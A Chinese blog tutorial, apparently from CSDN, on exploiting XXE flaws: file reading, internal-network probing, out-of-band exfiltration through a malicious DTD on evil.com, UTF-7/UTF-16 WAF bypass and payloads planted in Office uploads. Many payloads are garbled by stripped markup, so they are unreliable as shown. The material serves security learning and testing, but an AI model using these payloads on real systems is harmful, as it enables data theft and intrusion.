文件读取 xxe_XXE

最新推荐文章于 2023-07-06 10:06:00 发布
最新推荐文章于 2023-07-06 10:06:00 发布
阅读量724 收藏
点赞数
文章标签: 文件读取 xxe
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36165398/article/details/112733807
版权

一、    XXE是什么?有哪些危害?

XML外部实体,允许XML引用外部数据作为变量。形式如下。

<?xml version="1.0"?>]><user><username>&xxe;username><password>adminpassword>user>

由于外部实体允许多种协议,所以XXE等同于任意文件读取+SSRF
XXE靶场
https://github.com/c0ny1/xxe-lab

二、    XXE利用
如果传递的某个参数可以反射出来,那这就是一个带回显的XXE,可以利用file协议进行任意文件读取

POST /xxe/doLogin.php HTTP/1.1Host: luoke.cn:81Content-Type: application/xml;charset=utf-8Content-Length: 157<?xml version="1.0"?>]><user><username>&xxe;username><password>adminpassword>user>

26e50a2b4c388964b18645ff95531c32.png

其次可以用http(s),ftp等协议来探测内网。php支持一些伪协议,java支持jar,旧版支持gopher。

<?xml version="1.0"?>]><user><username>&xxe;username><password>adminpassword>user>

或者

<?xml version="1.0"?>%xxe;]><user><username>adminusername><password>adminpassword>user>

此时内容很难回显,可以尝试从报错信息和响应时间来判断端口是否开放,也常用dnslog来判定是否存在xxe漏洞或者支持此协议。
其中php支持更多伪协议,比如data:text/plain,luoke

76178c53c6728fcfd4f72dc21fcf433b.png

更常用的是php://filter/convert.base64-encode/resource=doLogin.php,用来绕过和xml冲突的一些字符【'"<>?&】

dced9fc98e5fd471ba09962060e588a9.png

更多伪协议见《php文件包含》。

三、    dtd利用
可以在恶意服务器中放置dtd文件,然后将file或者http探测代码写在dtd上,xml请求时引入

<?xml version="1.0"?>%dtd;]><user><username>&all;username><password>adminpassword>user>

dtd内容为

<!ENTITY all SYSTEM "php://filter/convert.base64-encode/resource=doLogin.php">

46d36be75fd60481e4a0d06ec376601f.png

dtd还常用于没有反射变量,通过url请求外带数据。
在evil.com上监听其8081端口,请求为:

<?xml version="1.0"?>%dtd;]><user><username>adminusername><password>adminpassword>user>

dtd内容为:

"php://filter/convert.base64-encode/resource=doLogin.php">eval %eval;%error;

89a9bb9c40f3e1a1463e8654a31e6098.png

也可以用dtd在外部拼接CDATA从而绕过xml显示【'"<>?&】字符限制,但无法绕过【%】限制
C盘根目录新建一个test'"<>?&test内容的test文件
请求为

<?xml version="1.0" encoding="utf-8"?>      ">  <!ENTITY % dtd SYSTEM "http://evil.com/evil.dtd"> %dtd; ]> <user><username>&all;username><password>adminpassword>user>

dtd改为

"%start;%goodies;%end;">

a35536b76f11857b6a61dd47e6896a53.png

在内部实体中是无法进行拼接的,也无法外带数据。

除此之外,在java环境中,换行文件用ftp协议外带更容易。


此外还有一种本地dtd文件的利用
https://blog.csdn.net/qq_38154820/article/details/106330095

四、    编码绕过WAF

xml支持UTF-16和UTF-7,常用来绕过WAF拦截
新建utf-8.xml

<?xml version="1.0"?>]><user><username>&xxe;username><password>adminpassword>user>

linux系统中iconv -f utf8 -t utf16 utf-8.xml > utf-16.xml
iconv -f utf8 -t utf7 utf-8.xml > utf-7.xml

0ebadbcdcfbe83f8d9e6165b703a1bdd.png

6597a50954072ec88cd3849b9b251d0c.png

utf-7需要替换一下xml头为<?xmlversion ="1.0" encoding="utf-7"?>

9e7a30fb0997e573dba770935accd7d8.png

utf-16规则为fffe的BOM头,每个字节加上00
所以很容易用python写出转码脚本

#python2f8 = open('utf-8.xml','rb')f16 = open('utf-16.xml','wb')p8 = f8.read().encode('hex')p16 = "fffe"+("00".join(p8[i: i+2] for i in range(0, len(p8)+1, 2)))f16.write(p16.decode('hex'))

utf-7较为复杂,用php处理xml请求再反射回来处理比较容易,注意&xxe;先改为xxe;

<?php libxml_disable_entity_loader(false);$xml = <<<?xml version="1.0" encoding="utf-7"?>]>xxe;adminEOD;$dom = new DOMDocument;$dom->preserveWhiteSpace = false;$dom->formatOutput = true;// load the XML string defined above$dom->loadXML($xml,LIBXML_NOENT);// substitute xincludes$a = $dom->saveXML();$a = str_replace("+AD4-xxe","+AD4AJg-xxe",$a);$a = str_replace("+ADw?xml version+AD0AIg-1.0+ACI encoding+AD0AIg-utf-7+ACI?+AD4",'<?xml version="1.0" encoding="utf-7"?>',$a);echo $a;?>

ab5f573c651d0a51cfe57eaa39a4b692.png

五、    文件XXE

有时候会直接上传xml文件进行解析,也可能产生XXE。
而微软的新版office文件都是xml的压缩文件形式。
最典型的xlsx文件导入数据,比如1.xlsx改为1.zip,解压即可看到

fe96f6d3e817e4724775732af4ff250c.png

修改[Content_Types].xml,插入恶意代码,然后重新压缩回xlsx,上传即可触发dnslog

]><x>&xxe;<x>

009f8588ddd3f9a6eacf70e6e90a08a0.png

也可以尝试其他文件,比如/xl/workbook.xml 、/xl/worksheets/shee1.xml

除此之外,docx,pptx等文件也可能存在同类问题。

Java常用的poi和poi-ooxml存在如下office文件上传xxe漏洞

CVE-2014-3529/CVE-2014-3574/CVE-2016-5000/CVE-2017-5644/

Weblogic存在xml文件上传xxe漏洞

CVE-2018-3246

Lee的呼吸教室
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
33-3 XXE漏洞 - XXE外部实体注入(文件读取
weixin_43263566的博客
04-02 263
这个XML文档看起来很简单,但实际上它包含了一种XML外部实体注入(XXE)攻击。通过在DTD中定义恶意实体并在XML文档中引用它们,攻击者可以利用XXE漏洞来读取敏感文件、执行命令或进行其他恶意操作。实体可以在XML文档中被引用,类似于变量,在文档解析过程中会被替换为其定义的值。:这是DOCTYPE声明,用于指定XML文档的文档类型定义(DTD)。,但实际上它可以被定义为任何攻击者想要的内容,包括文件路径、命令等。:这是XML文档的声明部分,指定了XML版本和字符编码。:在DTD中定义了一个实体。
xxe_cology在集团企业运用.doc
09-22
xxe_cology在集团企业运用.doc
windows文件读取 xxe_XXE漏洞利用方式详解
weixin_35029653的博客
12-11 592
在XXE漏洞的详细原理解释和利用中,XXE的基本原理还有简单的文件读取利用方式我们已经有了基本的了解,那么接下来就带来我们的XXE漏洞详解——进阶篇!xxe漏洞利用在实战中往往会遇到很多的问题,也需要更多种多样的利用方式和技巧,本片就给大家一一介绍~读取文件时有特殊符号在读取文件时,文件中包含"<,>,&"等这些特殊符号时,会被xml解析器解析,报错从而导致读取失败,例如尝试读...
文件读取 xxe_关于XML解析的外部实例引用漏洞攻击XXE
weixin_35914716的博客
01-15 461
XXE全称是——XML External Entity,也就是XML外部实体注入攻击。该漏洞的核心主要是在对不安全的外部实体数据进行处理时引发的安全攻击问题。如果攻击者可以上传XML文档、或HTTP通信过程中采用XML格式传输数据,并且能够在XML文档中添加恶意内容,他们就能够攻击含有缺陷的XML处理器。XXE漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行...
xxe重点内容
Thegentlest的博客
09-04 1032
xxe重点内容以及实操
XXE漏洞详解(三)——XXE漏洞实际运用
永远是少年
12-23 732
今天继续给大家介绍渗透测试相关知识,本文主要内容是XXE漏洞详解(三)——XXE漏洞实际运用。 一、XXE漏洞简介 二、XXE漏洞pikachu靶场介绍 三、XXE漏洞pikachu靶场实战 (一)利用XXE漏洞读取文件 (二)利用XXE漏洞进行内网探测
XXE之文件随意读取
weixin_48421613的博客
09-03 1762
XXE的利用 声明: 我们本次实验所使用的php版本为5.4版本,有些版本是实验不成功的 XXE注入可分为有回显的与没有回显的 有回显的:制造一个具有xxe漏洞的代码(xxe.php) <?php $xml=simplexml_load_string($_GET['xml']); echo $xml; //这是有回显的xxe注入 ?> 首先我们使用我们本地的服务器进行探测,使用burpsuite进行抓板进行分析 我们可以看到我们提交的参数已经出
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
最新发布
09-15
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
SCAN_XXE:利用XML XXE漏洞
05-07
SCAN_XXE 利用XML XXE漏洞
第四节 XXE漏洞利用 - 任意文件读取-01
09-15
第四节 XXE漏洞利用 - 任意文件读取-01
信息安全_xxe注入应用与拓展.pptx
08-14
什么是XXE 什么地方可能存在XXE Zend框架 Xml-rpc模块的xxe Springmvc里的xxe slim框架里的xxe 解析docx文件 XXE能干嘛 XXE怎么去读文件 XXE注入外带数据回显 XXE怎么去修复
XXE超详细讲解(都是纯纯的干货)
weixin_63688999的博客
07-06 790
XXE (XML External Entity injection)XML 外部实体注入漏洞,如果XML 文件在引用外部实体时候,可以沟通构造恶意内容,可以导致读取任意文件,命令执行和对内网的攻击,这就是XXE漏洞,这个漏洞需要大家还有一定的XML协议基础。XML是可扩展的标记语言(eXtensible Markup Language),设计用来进行数据的传输和存储, 结构是树形结构,有标签构成,这点很像HTML语言。语法引用的外部实体,而非内部实体,那么uri中能写那些类型的外部实体呢?
XEE漏洞任意文件读取
m0_58001548的博客
04-30 1754
XXE全称是——XML External Entity,也就是XML外部实体注入攻击。通过 XML实体,"SYSTEM”关键词导致XML解析器可以从本地文件或者远程URI中读取数据。所以攻击者可以通过XML实体传递自己构造的恶意值,使处理程序解析它。当引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。XML指可扩展标记语言(Extensible Markup Language)XML是一种标记语言,很类似HTML。
Web安全 XXE漏洞的 测试和利用.(读取服务器的任何文件 和 收集服务器的内网信息.)
网络安全领域___专研者.
03-08 6179
XXE漏洞全称(XML External Entity Injection),即XML外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成:文件读取、命令执行、内网端口扫描、攻击内网网站,DOS攻击 等危害.(xxe漏洞触发的点往往是可以上传xml文件的位置的,没有对上传的xml文件进行过滤,导致可上传恶意xml文件.)
windows文件读取 xxe_Web应用常见漏洞浅析:XXE任意文件读写漏洞、远程代码执行……...
weixin_39551993的博客
12-22 579
原标题:Web应用常见漏洞浅析:XXE任意文件读写漏洞、远程代码执行…… 你的Web应用是否存在XXE漏洞? 如果你的应用是通过用户上传处理XML文件或POST请求(例如将SAML用于单点登录服务甚至是RSS)的,那么你很有可能会受到XXE的攻击。XXE是一种非常常见的漏洞类型,我们几乎每天都会碰到它。在去年的几次web应用渗透中,我们就成功的利用了好几回。什么是XXE“简单来说,XXE就是XML...
XXE漏洞-黑白盒测试+无回显
xiaoheizi的博客
07-02 745
XML被设计是为了传输和存储数据,XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。test.dtd内容:
XXE读取文件 Geek10th
weixin_44377940的博客
11-14 988
点开网站: 抓包,修改属性: 返回了这么一串: 由于是$name==md5(),由弱类型比较和md5想到md5碰撞,
[ctf web]XXE通过DTD读取文件+XML和DTD基础语法(以[ctfshow]web_ak4观心和[NCTF2019]Fake XML cookbook为例)
ShenZ的博客
08-23 657
XML基础 XML文件可以分为三部分: XML声明 <?xml version ="1.0" encoding="UTF-8"?> DTD文档定义类型。 文档元素 <foo><note category="COOKING"></note></foo> 根元素foo,子元素note,属性category XML语法 XML被设计为传输和存储数据 基本语法: - 所有 XML 元素都须有关闭标签。 - XML 标签对大小写敏感。 - X
利用XXE漏洞读取PHP文件内容攻击如何防范
06-08
针对利用XXE漏洞读取PHP文件内容的攻击,可以采取以下措施: 1. 避免使用外部实体。禁用或限制XML解析器的外部实体,以防止攻击者利用外部实体注入恶意代码。 2. 使用白名单机制。限制XML解析器只能访问预先定义的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值